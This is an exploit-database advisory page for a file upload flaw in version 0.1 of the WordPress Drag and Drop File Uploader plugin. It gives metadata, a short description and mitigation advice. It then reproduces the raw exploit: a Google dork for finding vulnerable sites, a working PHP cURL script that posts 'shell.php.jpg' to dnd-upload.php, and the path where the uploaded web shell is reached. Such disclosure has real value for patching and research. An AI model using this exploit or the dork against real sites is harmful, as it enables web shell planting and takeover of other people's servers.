Wordpress drag and drop file upload 0.1 Arbitrary File Upload

vendor:

Drag and Drop File Uploader

by:

Adrien Thierry

9,3

CVSS

HIGH

Arbitrary File Upload

434

CWE

Product Name: Drag and Drop File Uploader

Affected Version From: 0.1

Affected Version To: 0.1

Patch Exists: YES

Related CWE: N/A

CPE: a:wordpress:drag_and_drop_file_uploader:0.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2012

WordPress drag and drop file upload 0.1 Arbitrary File Upload

An arbitrary file upload vulnerability exists in the Wordpress drag and drop file upload plugin version 0.1. An attacker can upload a malicious file to the vulnerable server by sending a specially crafted HTTP POST request to the dnd-upload.php page. This can allow an attacker to gain remote code execution on the vulnerable server.

Mitigation:

Upgrade to the latest version of the plugin or disable the plugin if it is not necessary.

Source

Exploit-DB raw data:

###########################################################
#
# Exploit Title: Wordpress drag and drop file upload 0.1 Arbitrary File Upload
# Google Dork: inurl:wp-content/plugins/drag-drop-file-uploader/
# Date: 11/06/2012
# Exploit Author: Adrien Thierry
# Vendor Homepage:  http://www.ali.dj/
# Software Link: http://downloads.wordpress.org/plugin/drag-drop-file-uploader.0.1.zip
# Version: 0.1
#
###########################################################

Vuln page : http://mysite.com/wp-content/plugins/drag-drop-file-uploader/dnd-upload.php

exploit :

<?php
$u="shell.php.jpg";
$c = curl_init("http://127.0.0.1/wp/wp-content/plugins/drag-drop-file-uploader/dnd-upload.php");
curl_setopt($c, CURLOPT_POST, true);
curl_setopt($c, CURLOPT_POSTFIELDS,
array('file'=>"@$u"));
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
$e = curl_exec($c);
curl_close($c);
echo $e; 
?>

Shell access : http://mysite.com/wp-content/uploads/[YYYY]/[MM]/shell.php.jpg

#####################################################################